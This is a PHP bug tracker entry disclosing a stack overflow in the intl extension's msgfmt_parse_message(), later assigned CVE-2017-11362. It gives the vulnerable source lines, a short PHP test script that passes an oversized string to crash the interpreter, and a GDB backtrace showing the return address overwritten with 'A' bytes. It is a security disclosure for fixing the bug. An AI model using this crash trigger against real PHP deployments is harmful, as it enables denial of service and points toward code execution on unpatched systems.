|
|
php.net | support | documentation | report a bug | advanced search | search howto | statistics | random bug | login |
PatchesPull RequestsHistoryAllCommentsChangesGit/SVN commits
[2016-11-07 10:49 UTC] emmanuel dot law at gmail dot com
[2016-11-18 14:41 UTC] krakjoe@php.net
-Type: Security
+Type: Bug
[2016-11-18 14:41 UTC] krakjoe@php.net
[2016-11-18 15:45 UTC] emmanuel dot law at gmail dot com
[2017-06-02 22:01 UTC] nikic@php.net
[2017-06-02 22:06 UTC] nikic@php.net
[2017-06-02 22:06 UTC] nikic@php.net
-Status: Open
+Status: Closed
[2017-07-17 22:55 UTC] emmanuel dot law at gmail dot com
[2017-07-17 22:55 UTC] emmanuel dot law at gmail dot com
[2017-07-18 05:39 UTC] stas@php.net
-Assigned To:
+Assigned To: stas
[2017-07-18 05:39 UTC] stas@php.net
[2018-01-15 13:48 UTC] kaplan@php.net
-CVE-ID:
+CVE-ID: 2017-11362
|
|||||||||||||||||||||||||||
Copyright © 2001-2024 The PHP GroupAll rights reserved. |
Last updated: Thu Nov 21 08:01:29 2024 UTC |
Description: ------------ There exist a stack overflow when parsing locale in msgfmt_parse_message(). The vulnerability is being triggered in line 142 where an overtly long slocale is being passed into libicu's umsg_open(). //php-7.0.12/ext/intl/msgformat/msgformat_parse.c 90 PHP_FUNCTION( msgfmt_parse_message ) 91 { 92 UChar *spattern = NULL; 93 int spattern_len = 0 .... 141 /* Create an ICU message formatter. */ 142 MSG_FORMAT_OBJECT(mfo) = umsg_open(spattern, spattern_len, slocale, NULL, &INTL_DATA_ERROR_CODE(mfo)); Test script: --------------- <?php ini_set('memory_limit', -1); $boom = str_repeat("A",2147483647+1); msgfmt_parse_message($boom,"ABC","EFG"); Actual result: -------------- ./php-7.0.12 test.php Segmentation fault ====Digging into GDB==== gdb-peda$ continue Continuing. Program received signal SIGSEGV, Segmentation fault. Stopped reason: SIGSEGV gdb-peda$ backtrace #0 __strcpy_sse2_unaligned () at ../sysdeps/x86_64/multiarch/strcpy-sse2-unaligned.S:241 #1 0x00007ffff382368c in strcpy (__src=0x7fff6d400018 'A' <repeats 200 times>..., __dest=0x7fffffffa29d 'A' <repeats 200 times>...) at /usr/include/x86_64-linux-gnu/bits/string3.h:104 #2 icu_52::Locale::Locale (this=0x7fffffffa420, newLanguage=0x7fff6d400018 'A' <repeats 200 times>..., newCountry=0x0, newVariant=0x0, newKeywords=0x0) at locid.cpp:336 #3 0x4141414141414141 in ?? () #4 0x4141414141414141 in ?? () #5 0x4141414141414141 in ?? () #6 0x4141414141414141 in ?? () #7 0x4141414141414141 in ?? () #8 0x4141414141414141 in ?? () #9 0x4141414141414141 in ?? () ....... .....